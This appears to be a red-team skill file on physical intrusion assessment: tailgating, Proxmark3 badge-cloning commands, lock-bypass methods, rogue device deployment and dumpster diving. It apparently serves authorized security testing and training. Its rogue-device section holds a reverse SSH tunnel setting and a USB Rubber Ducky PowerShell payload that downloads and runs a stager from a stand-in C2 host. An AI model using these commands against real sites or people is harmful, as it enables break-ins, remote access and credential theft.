Mapped every skill to NIST CSF 2.0 subcategory IDs (GV/ID/PR/DE/RS/RC functions)
based on subdomain and content analysis. Restores 11 skills corrupted during
prior rebase, re-enriching with ATLAS, D3FEND, NIST AI RMF, and CSF 2.0 fields.
All 754 skills now carry structured mappings for all 5 security frameworks:
- MITRE ATT&CK (in tags)
- MITRE ATLAS v5.5 (atlas_techniques)
- MITRE D3FEND v1.3 (d3fend_techniques)
- NIST AI RMF 1.0 (nist_ai_rmf)
- NIST CSF 2.0 (nist_csf)
Conduct authorized physical penetration testing using tailgating, badge cloning, lock bypassing, and rogue device deployment to evaluate facility security controls.
cybersecurity
red-teaming
physical-security
red-team
tailgating
badge-cloning
lock-picking
rfid
physical-pentest
1.0
mahipal
Apache-2.0
Platform Hardening
Hardware Component Inventory
Electromagnetic Radiation Hardening
RF Shielding
Asset Inventory
ID.RA-01
GV.OV-02
DE.AE-07
Performing Physical Intrusion Assessment
Overview
Physical intrusion assessment evaluates an organization's physical security controls by attempting to gain unauthorized access to facilities, server rooms, and restricted areas. This includes tailgating employees, cloning RFID access badges, bypassing locks, deploying rogue network devices, and testing security guard procedures. Physical security testing is a critical component of full-scope red team engagements, as it often provides the most direct path to network access. MITRE ATT&CK maps physical access techniques under T1200 (Hardware Additions) and T1091 (Replication Through Removable Media).
When to Use
When conducting security assessments that involve performing physical intrusion assessment
When following incident response procedures for related security events
When performing scheduled security testing or auditing activities
When validating security controls through hands-on testing
Prerequisites
Signed authorization letter (carry at all times during assessment)
Emergency contact for client security team (24/7)
Get-out-of-jail letter signed by executive authority
Busy entrance timing: Enter during shift change or lunch rush
Door propping: Observe if employees prop doors open
Countermeasures to test:
Turnstiles / mantraps
Security guard challenge procedures
Piggybacking detection systems
Employee security awareness
Technique 2: Badge Cloning
# Proxmark3 - Read a low-frequency (125kHz) HID card
proxmark3> lf hid read# Output: HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 45678# Clone to a T5577 blank card
proxmark3> lf hid clone --fc 123 --cn 45678# Read high-frequency (13.56MHz) MIFARE card
proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF
# Long-range capture with custom antenna (up to 3 feet)
proxmark3> lf hid read# with extended antenna# Flipper Zero - Read and emulate# RFID > Read > Hold card to Flipper > Save > Emulate
Badge cloning attack flow:
Position near badge reader (elevator, door entry)
Read badge wirelessly as employee passes (1-3 second window)
Clone to blank card
Use cloned badge to access secured areas
Document which areas were accessible
Technique 3: Lock Bypassing
Lock Type
Bypass Method
Difficulty
Pin tumbler (standard)
Pick, rake, or bump key
Easy-Medium
Wafer lock (filing cabinets)
Pick or jiggle
Easy
Tubular lock (vending, server)
Tubular pick tool
Easy
Electronic lock (keypad)
Shoulder surf, thermal camera
Medium
Magnetic lock (mag lock)
Under-door tool, REX sensor bypass
Medium
Smart lock (Bluetooth)
Replay attack, firmware exploit
Hard
# Electronic keypad - thermal imaging after use# Warmer keys = more recently pressed# Use FLIR camera to capture heat signatures within 30 seconds# REX (Request to Exit) sensor bypass# Insert thin wire or use a can of compressed air to trigger motion sensor# on the inside of a mag-locked door
Technique 4: Rogue Device Deployment
# LAN Turtle - Plug into exposed Ethernet port# Provides SSH reverse tunnel back to C2 server# Auto-configures as man-in-the-middle# Configure LAN Turtle for reverse SSH# Module: AutoSSH# Host: c2.redteam.com# Port: 22# Remote port: 2222# WiFi Pineapple - Deploy in common area# Captures wireless credentials via evil twin attack# Exfiltrates data over cellular modem# USB Rubber Ducky - Drop in parking lot or leave on desk# Payload: Download and execute C2 agent# Duckyscript:# DELAY 1000# GUI r# DELAY 500# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"# ENTER
Technique 5: Dumpster Diving
Search external waste containers and recycling bins for:
Printed documents with sensitive information
Employee directories and org charts
Network diagrams and IP addresses
Shredded documents (cross-cut vs strip-cut assessment)
Discarded hardware (hard drives, USB drives)
Assessment Methodology
Pre-Assessment Reconnaissance
Perimeter walk - identify all entry points, cameras, guard posts